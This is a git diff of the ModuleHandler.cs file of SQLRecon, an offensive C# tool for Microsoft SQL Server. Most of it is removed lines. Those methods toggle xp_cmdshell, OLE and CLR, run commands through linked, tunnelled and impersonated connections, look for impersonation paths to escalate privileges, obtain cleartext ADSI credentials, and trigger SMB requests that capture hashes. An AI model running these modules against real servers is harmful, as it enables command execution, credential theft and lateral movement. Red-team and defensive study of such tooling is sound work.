-        /// disable CLR integration.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ldisableclr()
-        {
-            _print.Status(string.Format("Disabling CLR integration on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "clr enabled", "0", _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The ldisableole method is used against linked SQL servers to
-        /// disable OLE automation.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ldisableole()
-        {
-            _print.Status(string.Format("Disabling OLE Automation Procedures on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "OLE Automation Procedures", "0",
-                _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The ldisablexp method is used against linked SQL servers to
-        /// disable xp_cmdshell.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ldisablexp()
-        {
-            _print.Status(string.Format("Disabling xp_cmdshell on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "xp_cmdshell", "0",
-                _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The lenableclr method is used against linked SQL servers to
-        /// enable CLR integration.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lenableclr()
-        {
-            _print.Status(string.Format("Enabling CLR integration on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "clr enabled", "1",
-                _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The lenableole method is used against linked SQL servers to
-        /// enable OLE automation.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lenableole()
-        {
-            _print.Status(string.Format("Enabling OLE Automation Procedures on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "OLE Automation Procedures", "1",
-                _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The lenablexp method is used against linked SQL servers to
-        /// enable xp_cmdshell.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lenablexp()
-        {
-            _print.Status(string.Format("Enabling xp_cmdshell on {0} via {1}",
-                _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "xp_cmdshell", "1",
-                _linkedSqlServer, _sqlServer);
-        }
-
-        /// <summary>
-        /// The llinks method is used against linked instances of SQL server to
-        /// determine if the remote linked SQL server has a link configured to other SQL servers.
-        /// It provides detailed information about each linked server, including the local login mapping,
-        /// whether self-mapping is used, the remote login, and other linked server properties.
-        /// </summary>
-        public static void llinks()
-        {
-            _print.Status($"Additional SQL links and login mappings on {_linkedSqlServer} via {_sqlServer}", true);
-
-            // Query to fetch detailed linked server information along with login mappings
-            _query = @"
-                SELECT
-                    srv.name AS [Linked Server],
-                    srv.product,
-                    srv.provider,
-                    srv.data_source,
-                    COALESCE(prin.name, ''N/A'') AS [Local Login],
-                    ll.uses_self_credential AS [Is Self Mapping],
-                    ll.remote_name AS [Remote Login]
-                FROM
-                    sys.servers srv
-                    LEFT JOIN sys.linked_logins ll ON srv.server_id = ll.server_id
-                    LEFT JOIN sys.server_principals prin ON ll.local_principal_id = prin.principal_id
-                WHERE
-                    srv.is_linked = 1";
-
-            string result = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, _query);
-            _print.IsOutputEmpty(result, true);
-        }
-
-        /// <summary>
-        /// The limpersonate method is used against linked instances of SQL server to
-        /// identify if any SQL accounts on the linked server can be impersonated. This method is particularly
-        /// crucial for understanding potential privilege escalation paths on remote servers.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void limpersonate()
-        {
-            // Display the current server user
-            string currentUserQuery = "SELECT SYSTEM_USER;";
-            string currentUserResult = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, currentUserQuery);
-            string currentUser = _sqlQuery.ExtractColumnValues(currentUserResult, "column0").FirstOrDefault();
-
-            _print.Status($"Connected to {_linkedSqlServer} from {_sqlServer} with server user '{currentUser}'", true);
-
-            // Query to check if the current user on the linked server is a sysadmin
-            string sysAdminCheckQuery = "SELECT IS_SRVROLEMEMBER('sysadmin');";
-            string isSysAdmin = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, sysAdminCheckQuery);
-
-            if (isSysAdmin.Contains("1"))
-            {
-                _print.Status("The user can impersonate any account on the linked server.", true);
-                string allLoginsQuery = "SELECT name FROM sys.server_principals WHERE type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN') AND name NOT LIKE '##%';";
-                string allLogins = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, allLoginsQuery);
-                Console.WriteLine(!string.IsNullOrWhiteSpace(allLogins) ? allLogins : "No logins found to impersonate on the linked server.");
-            }
-            else
-            {
-                string allLoginsQuery = "SELECT name FROM sys.server_principals WHERE type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN') AND name NOT LIKE '##%';";
-                string allLogins = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, allLoginsQuery);
-
-                if (!string.IsNullOrWhiteSpace(allLogins))
-                {
-                    foreach (var login in allLogins.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries).Skip(1)) // Skip header
-                    {
-                        string user = login.Trim().Split('|')[0].Trim(); // Extract the username
-                                                                         // Directly check for impersonation possibility for each user
-                        string impersonateCheckQuery = $"SELECT 1 FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' AND b.name = '{user.Replace("'", "''")}'";
-                        string impersonateCheckResult = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, impersonateCheckQuery);
-
-                        if (!string.IsNullOrWhiteSpace(impersonateCheckResult))
-                        {
-                            Console.WriteLine($"{user} can potentially be impersonated on the linked server {_linkedSqlServer}.");
-                        }
-                    }
-                }
-                else
-                {
-                    Console.WriteLine("No logins found to check for impersonation on the linked server.");
-                }
-            }
-        }
-
-
-        /// <summary>
-        /// The lolecmd method is used against linked SQL servers to
-        /// execute a user supplied command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lolecmd()
-        {
-            _print.Status(string.Format("Executing '{0}' on {1} via {2}",
-                _arg1, _linkedSqlServer, _sqlServer), true);
-            _ole.Linked(_connection, _arg1, _linkedSqlServer);
-        }
-
-        /// <summary>
-        /// The lquery method is used against linked SQL servers to
-        /// execute a user supplied SQL command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lquery()
-        {
-            _print.Status(string.Format("Executing '{0}' on {1} via {2}",
-                _arg1, _linkedSqlServer, _sqlServer), true);
-            _print.IsOutputEmpty(_sqlQuery.ExecuteLinkedCustomQuery(
-                _connection, _linkedSqlServer, _arg1), true);
-        }
-
-        /// <summary>
-        /// The lrows method is used against linked SQL servers to
-        /// determine the number of rows in a table.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void lrows()
-        {
-            // First check to see if rpc is enabled.
-            _query = _config.ModuleStatus(_connection, "rpc", "null", _linkedSqlServer);
-            if (!_query.Contains("1"))
-            {
-                _print.Error(string.Format("You need to enable RPC for {1} on {0} (enablerpc /rhost:{1}).",
-                   _sqlServer, _linkedSqlServer), true);
-                // Go no futher.
-                return;
-            }
-
-            _print.Status(string.Format("Displaying number of rows from '{1}' in '{0}' on {2} via {3}",
-                _arg1, _arg2, _linkedSqlServer, _sqlServer), true);
-
-            _query = "use " + _arg1 + ";" +
-                "SELECT COUNT(*) as row_count FROM " + _arg2 + ";";
-
-            _print.IsOutputEmpty(_sqlQuery.ExecuteLinkedCustomQueryRpcExec(
-                _connection, _linkedSqlServer, _query), true);
-        }
-
-        /// <summary>
-        /// The lsearch method is used against linked SQL servers to
-        /// search a table for a specific column name.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lsearch()
-        {
-            // First check to see if rpc is enabled.
-            _query = _config.ModuleStatus(_connection, "rpc", "null", _linkedSqlServer);
-            if (!_query.Contains("1"))
-            {
-                _print.Error(string.Format("You need to enable RPC for {1} on {0} (enablerpc -o {1}).",
-                    _sqlServer, _linkedSqlServer), true);
-                // Go no futher.
-                return;
-            }
-
-            _print.Status(string.Format("Searching for columns containing '{0}' on {1} in '{2}' via {3}",
-                _arg2, _linkedSqlServer, _arg1, _sqlServer), true);
-
-            _query = "use " + _arg1 + ";" +
-                "SELECT table_name, column_name " +
-                "FROM INFORMATION_SCHEMA.COLUMNS WHERE column_name LIKE ''%" + _arg2 + "%'';";
-
-            _print.IsOutputEmpty(_sqlQuery.ExecuteLinkedCustomQueryRpcExec(
-                _connection, _linkedSqlServer, _query), true);
-        }
-
-        /// <summary>
-        /// The lsmb method is used against linked SQL servers to
-        /// make the linked SQL server solicit a SMB request to an arbitrary host.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lsmb()
-        {
-            CaptureHash _ = new(_connection, _arg1, _linkedSqlServer);
-            _print.Status(string.Format("SMB Request from {0} to {1} via {2}.",
-                _linkedSqlServer, _arg1, _sqlServer), true);
-        }
-
-        /// <summary>
-        /// The ltables method is used against linked SQL servers to
-        /// retrieve the tables from the user supplied database.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ltables()
-        {
-            _print.Status(string.Format("Tables in database '{0}' on {1} via {2}",
-                _arg1, _linkedSqlServer, _sqlServer), true);
-            _query = "SELECT * FROM " + _arg1 + ".INFORMATION_SCHEMA.TABLES;";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteLinkedCustomQuery(
-                _connection, _linkedSqlServer, _query), true);
-        }
-
-
-        /// <summary>
-        /// The lxpcmd method is used against linked SQL servers to
-        ///  execute a user supplied command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void lxpcmd()
-        {
-            _print.Status(string.Format("Executing '{0}' on {1} via {2}.",
-                _arg1, _linkedSqlServer, _sqlServer), true);
-            _xpCmdShell.Linked(_connection, _arg1, _linkedSqlServer);
-        }
-
-        /*
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         * ***************     Tunnel SQL Server Modules    ****************
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         */
-
-        /// <summary>
-        /// The tquery method is used against a chain of linked SQL servers to
-        /// execute a user supplied SQL command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void tquery()
-        {
-            _print.Status($"Executing '{_arg1}' from tunnel {_tunnelPath}", true);
-            _print.IsOutputEmpty(_sqlQuery.ExecuteTunnelCustomQuery(
-                _connection, _tunnelSqlServer, _arg1), true);
-        }
-
-
-        public static void timpersonate()
-        {
-
-            // Display the current server user
-            string currentUserQuery = "SELECT SYSTEM_USER;";
-            string currentUserResult = _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, currentUserQuery);
-            string currentUser = currentUserResult.Split('\n').Skip(2).FirstOrDefault()?.Trim().TrimEnd(new char[] { ' ', '|' });
-
-            _print.Success($"Tunneled through {_tunnelPath} and emerging with the user '{currentUser}'", true);
-
-            // Query to check if the current user on the last server in the tunnel is a sysadmin
-            string sysAdminCheckQuery = "SELECT IS_SRVROLEMEMBER('sysadmin');";
-            string isSysAdmin = _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, sysAdminCheckQuery);
-
-            if (isSysAdmin.Contains("1"))
-            {
-                _print.Status("The user can impersonate any account on the linked server.", true);
-                string allLoginsQuery = "SELECT name FROM sys.server_principals WHERE type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN') AND name NOT LIKE '##%';";
-                string allLogins = _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, allLoginsQuery);
-                Console.WriteLine(!string.IsNullOrWhiteSpace(allLogins) ? allLogins : "No logins found to impersonate on the linked server.");
-            }
-            else
-            {
-                // Enumerate all users and check which ones can be impersonated
-                string allLoginsQuery = "SELECT name FROM sys.server_principals WHERE type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN') AND name NOT LIKE '##%';";
-                string allLogins = _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, allLoginsQuery);
-
-                if (!string.IsNullOrWhiteSpace(allLogins))
-                {
-                    foreach (var login in allLogins.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries).Skip(1))
-                    {
-                        string user = login.Trim().Split('|')[0].Trim(); // Extract the username
-                                                                         // Directly check for impersonation possibility for each user
-                        string impersonateCheckQuery = $"SELECT 1 FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' AND b.name = '{user.Replace("'", "''")}'";
-                        string impersonateCheckResult = _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, impersonateCheckQuery);
-
-                        if (!string.IsNullOrWhiteSpace(impersonateCheckResult))
-                        {
-                            Console.WriteLine($"{user} can potentially be impersonated on the linked server.");
-                        }
-                    }
-                }
-                else
-                {
-                    Console.WriteLine("No logins found to check for impersonation on the linked server.");
-                }
-            }
-        }
-
-
-        /*
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         * *************** Impersonation SQL Server Modules ****************
-         * *****************************************************************
-         * *****************************************************************
-         * *****************************************************************
-         */
-
-        /// <summary>
-        /// The iadsi method is used in conjunction with an account that can be
-        /// impersonated to obtain cleartext ADSI credentials.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void iadsi()
-        {
-            _print.Status(string.Format("Obtaining ADSI credentials for '{1}' on {0} as '{2}'",
-                _sqlServer, _arg1, _impersonate), true);
-            _adsi.Impersonate(_connection, _arg1, _arg2, _impersonate);
-        }
-
-        /// <summary>
-        /// The iagentcmd method is used in conjunction with an account that can be
-        /// impersonated to execute commands via agent jobs.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void iagentcmd()
-        {
-            _print.Status(string.Format("Executing '{0}' as '{1}' on {2}",
-                _arg1, _impersonate, _sqlServer), true);
-            _agentJobs.Impersonate(_connection, _sqlServer, _arg1, _impersonate);
-        }
-
-        /// <summary>
-        /// The iagentstatus method is used in conjunction with an account that can be
-        /// impersonated to check if SQL server agent is running.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void iagentstatus()
-        {
-            _print.Status(string.Format("Getting SQL agent status on {0} as '{1}'",
-                _sqlServer, _impersonate), true);
-            _agentJobs.GetAgentStatusAndJobs(_connection, _sqlServer, _impersonate);
-        }
-
-        /// <summary>
-        /// The icheckrpc method is used in conjunction with an account that can be
-        /// impersonated against the initial SQL server to identify what systems can
-        /// have RPC enabled.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void icheckrpc()
-        {
-            _print.Status(string.Format("The following SQL servers can have RPC " +
-                "configured via {0} as '{1}'", _sqlServer, _impersonate), true);
-            _query = "SELECT name, is_rpc_out_enabled FROM sys.servers";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query), true);
-        }
-
-        /// <summary>
-        /// The icolumns method is used in conjunction with an account that can be
-        /// impersonated to list the columns for a table in a database.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void icolumns()
-        {
-            _print.Status(string.Format("Displaying columns from '{0}' in '{2}' as '{1}' on {3}",
-                _arg2, _impersonate, _arg1, _sqlServer), true);
-
-            _query = "use " + _arg1 + ";" +
-                "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
-                "WHERE TABLE_NAME = '" + _arg2 + "' ORDER BY ORDINAL_POSITION;";
-
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query), true);
-        }
-
-        /// <summary>
-        /// The iclr method is used in conjunction with an account that can be
-        /// impersonated to execute custom .NET CLR assemblies.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void iclr()
-        {
-            _print.Status(string.Format("Performing CLR custom assembly attack as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _clr.Impersonate(_connection, _arg1, _arg2, _impersonate);
-        }
-
-        /// <summary>
-        /// The idatabases method is used in conjunction with an account that can be
-        /// impersonated to show all configured databases.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void idatabases()
-        {
-            _print.Status(string.Format("Databases on {0}", _sqlServer), true);
-
-            _query = "SELECT dbid, name, crdate, filename FROM master.dbo.sysdatabases;";
-
-            Console.WriteLine(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query));
-        }
-
-        /// <summary>
-        /// The idisableclr method is used in conjunction with an account that can be
-        /// impersonated to disable CLR integration.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void idisableclr()
-        {
-            _print.Status(string.Format("Disabling CLR Integration as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _config.ModuleToggle(_connection, "clr enabled", "0", _sqlServer, _impersonate);
-        }
-
-        /// <summary>
-        /// The idisableole method is used in conjunction with an account that can be
-        /// impersonated to disable OLE automation.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void idisableole()
-        {
-            _print.Status(string.Format("Disabling Ole Automation Procedures as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _config.ModuleToggle(_connection, "Ole Automation Procedures", "0",
-                _sqlServer, _impersonate);
-        }
-
-        /// <summary>
-        /// The idisablerpc method is used against the initial SQL server to
-        /// disable 'rpc out' on a specified SQL server with an account that can be
-        /// impersonated.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void idisablerpc()
-        {
-            _print.Status(string.Format("Disabling RPC on {0}", _arg1), true);
-            _config.ModuleToggle(_connection, "rpc", "false", _arg1, _impersonate);
-        }
-
-        /// <summary>
-        /// The idisablexp method is used in conjunction with an account that can be
-        /// impersonated to disable xp_cmdshell.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void idisablexp()
-        {
-            _print.Status(string.Format("Disabling xp_cmdshell as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _config.ModuleToggle(_connection, "xp_cmdshell", "0", _sqlServer, _impersonate);
-        }
-
-        /// <summary>
-        /// The ienableclr method is used in conjunction with an account that can be
-        /// impersonated to enable CLR integration.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ienableclr()
-        {
-            _print.Status(string.Format("Enabling CLR Integration as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _config.ModuleToggle(_connection, "clr enabled", "1", _sqlServer, _impersonate);
-        }
-
-        /// <summary>
-        /// The ienableole method is used in conjunction with an account that can be
-        /// impersonated to enable OLE automation.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ienableole()
-        {
-            _print.Status(string.Format("Enabling Ole Automation Procedures as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _config.ModuleToggle(_connection, "Ole Automation Procedures", "1",
-                _sqlServer, _impersonate);
-        }
-
-        /// <summary>
-        /// The ienablerpc method is used against the initial SQL server to
-        /// enable 'rpc out' on a specified SQL server with an account that can be
-        /// impersonated.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ienablerpc()
-        {
-            _print.Status(string.Format("Enabling RPC on {0}", _arg1), true);
-            _config.ModuleToggle(_connection, "rpc", "true", _arg1, _impersonate);
-        }
-
-        /// <summary>
-        /// The ienablexp method is used in conjunction with an account that can be
-        /// impersonated to enable xp_cmdshell.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ienablexp()
-        {
-            _print.Status(string.Format("Enabling xp_cmdshell as '{0}' on {1}",
-                _impersonate, _sqlServer), true);
-            _config.ModuleToggle(_connection, "xp_cmdshell", "1", _sqlServer, _impersonate);
-        }
-
-
-        /// <summary>
-        /// The ilinks method is used in conjunction with an account that can be
-        /// impersonated to determine if the remote SQL server has a link configured
-        /// to other SQL servers.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void ilinks()
-        {
-            _print.Status(string.Format("Obtaining additional SQL links on {0} as '{1}'",
-                _sqlServer, _impersonate), true);
-            _query = "SELECT name, product, provider, data_source FROM " +
-                "sys.servers WHERE is_linked = 1;";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query), true);
-        }
-
-        /// <summary>
-        /// The iolecmd method is used in conjunction with an account that can be
-        /// impersonated to execute a user supplied command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void iolecmd()
-        {
-            _print.Status(string.Format("Executing '{0}' as '{1}' on {2}",
-                _arg1, _impersonate, _sqlServer), true);
-            _ole.Impersonate(_connection, _arg1, _impersonate);
-        }
-
-        /// <summary>
-        /// The iquery method is used in conjunction with an account that can be
-        /// impersonated to execute a user supplied SQL query.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void iquery()
-        {
-            _print.Status(string.Format("Executing '{0}' as '{1}' on {2}",
-                _arg1, _impersonate, _sqlServer), true);
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _arg1), true);
-        }
-
-        /// <summary>
-        /// The irows method is used in conjunction with an account that can be
-        /// impersonated to determine the number of rows in a table.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// </summary>
-        public static void irows()
-        {
-            _print.Status(string.Format("Displaying number of rows from '{0}' in '{2}' as '{1}' on {3}",
-                _arg2, _impersonate, _arg1, _sqlServer), true);
-
-            _query = "use " + _arg1 + ";" +
-                "SELECT COUNT(*) as row_count FROM " + _arg2 + ";";
-
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query), true);
-        }
-
-        /// <summary>
-        /// The isearch method is used in conjunction with an account that can be
-        /// impersonated to search a table for a specific column name.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void isearch()
-        {
-            _print.Status(string.Format("Searching for columns containing '{0}' as '{1}' in {2}",
-                _arg1, _impersonate, _database), true);
-            _query = "SELECT table_name, column_name " +
-                "FROM INFORMATION_SCHEMA.COLUMNS WHERE column_name LIKE '%" + _arg1 + "%';";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query), true);
-        }
-
-        /// <summary>
-        /// The itables method is used in conjunction with an account that can be
-        /// impersonated to retrieve the tables from the user supplied database.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void itables()
-        {
-            _print.Status(string.Format("Displaying Tables in {0} as '{1}'",
-                _arg1, _impersonate), true);
-            _query = "SELECT * FROM " + _arg1 + ".INFORMATION_SCHEMA.TABLES;";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteImpersonationCustomQuery(
-                _connection, _impersonate, _query), true);
-        }
-
-
-        /// <summary>
-        /// The ixpcmd method is used in conjunction with an account that can be
-        /// impersonated to execute a user supplied command.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
-        public static void ixpcmd()
-        {
-            _print.Status(string.Format("Executing '{0}' as '{1}' on {2}.",
-                _arg1, _impersonate, _sqlServer), true);
-            _xpCmdShell.Impersonate(_connection, _arg1, _impersonate);
         }
 
         /*

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -48,11 +48,11 @@ namespace SQLRecon.Commands
             }
 
             _query = "SELECT SYSTEM_USER;";
-            _print.Status(string.Format("Logged in as server user '{0}'",
+            _print.Success(string.Format("Logged in as server user '{0}'",
                 _sqlQuery.ExecuteQuery(_connection, _query)), true);
 
             _query = "SELECT USER_NAME();";
-            _print.Status(string.Format("Mapped to the username '{0}'",
+            _print.Success(string.Format("Mapped to the username '{0}'",
                 _sqlQuery.ExecuteQuery(_connection, _query)), true);
 
             if (!string.IsNullOrEmpty(_impersonate))
@@ -69,7 +69,7 @@ namespace SQLRecon.Commands
             {
                 // Match the method name to the module that has been supplied as an argument.
                 MethodInfo method = type.GetMethod(_module);
-               
+
                 if (method != null)
                 {
                     // Call the method.
@@ -159,13 +159,13 @@ namespace SQLRecon.Commands
         /// The columns method is used against single instances of SQL server to
         /// list the columns for a table in a database.
         /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.       
+        /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void columns()
         {
             _print.Status(string.Format("Displaying columns from table '{1}' in '{0}' on {2}",
                 _arg1, _arg2, _sqlServer), true);
-                
+
             _query = "use " + _arg1 + ";" +
                 "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
                 "WHERE TABLE_NAME = '" + _arg2 + "' ORDER BY ORDINAL_POSITION;";
@@ -412,19 +412,19 @@ namespace SQLRecon.Commands
 
             // Query to fetch detailed linked server information along with login mappings
             _query = @"
-        SELECT 
-            srv.name AS [Linked Server], 
-            srv.product, 
-            srv.provider, 
+        SELECT
+            srv.name AS [Linked Server],
+            srv.product,
+            srv.provider,
             srv.data_source,
-            COALESCE(prin.name, 'N/A') AS [Local Login], 
-            ll.uses_self_credential AS [Is Self Mapping], 
+            COALESCE(prin.name, 'N/A') AS [Local Login],
+            ll.uses_self_credential AS [Is Self Mapping],
             ll.remote_name AS [Remote Login]
-        FROM 
+        FROM
             sys.servers srv
             LEFT JOIN sys.linked_logins ll ON srv.server_id = ll.server_id
             LEFT JOIN sys.server_principals prin ON ll.local_principal_id = prin.principal_id
-        WHERE 
+        WHERE
             srv.is_linked = 1;";
 
             // Execute the query and check if the output is empty
@@ -463,14 +463,14 @@ namespace SQLRecon.Commands
         /// The rows method is used against single instances of SQL server to
         /// determine the number of ` in a table.
         /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name. 
+        /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void rows()
         {
             _print.Status(string.Format("Displaying number of rows from table '{1}' in '{0}' on {2}",
                 _arg1, _arg2, _sqlServer), true);
 
-            _query = "use " + _arg1 + ";" + 
+            _query = "use " + _arg1 + ";" +
                 "SELECT COUNT(*) as row_count FROM " + _arg2 + ";";
             _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
         }
@@ -483,7 +483,7 @@ namespace SQLRecon.Commands
         /// <summary>
         public static void search()
         {
-            _print.Status(string.Format("Searching for columns containing '{0}' in '{1}' on {2}", 
+            _print.Status(string.Format("Searching for columns containing '{0}' in '{1}' on {2}",
                 _arg1, _database, _sqlServer), true);
 
             _query = "SELECT table_name, column_name " +
@@ -526,12 +526,12 @@ namespace SQLRecon.Commands
         public static void users()
         {
             _print.Status(string.Format("Users in the '{0}' database on {1}", _database, _sqlServer), true);
-            
+
             _query = "SELECT name AS username, create_date, " +
                     "modify_date, type_desc AS type, authentication_type_desc AS " +
                     "authentication_type FROM sys.database_principals WHERE type NOT " +
                     "IN ('A', 'R', 'X') AND sid IS NOT null ORDER BY username;";
-            
+
             Console.WriteLine(_sqlQuery.ExecuteCustomQuery(_connection, _query));
         }
 
@@ -599,7 +599,7 @@ namespace SQLRecon.Commands
         /// <summary>
         public static void ladsi()
         {
-            _print.Status(string.Format("Obtaining ADSI credentials for '{1}' on {2} via {1}", 
+            _print.Status(string.Format("Obtaining ADSI credentials for '{1}' on {2} via {1}",
                 _sqlServer, _arg1, _linkedSqlServer), true);
             _adsi.Linked(_connection, _arg1, _arg2, _linkedSqlServer, _sqlServer);
         }
@@ -612,7 +612,7 @@ namespace SQLRecon.Commands
         /// <summary>
         public static void lagentcmd()
         {
-            _print.Status(string.Format("Executing '{0}' using PowerShell on {1} via {2}", 
+            _print.Status(string.Format("Executing '{0}' using PowerShell on {1} via {2}",
                 _arg1, _linkedSqlServer, _sqlServer), true);
             _agentJobs.Linked(_connection, _linkedSqlServer, "PowerShell", _arg1, _sqlServer);
         }
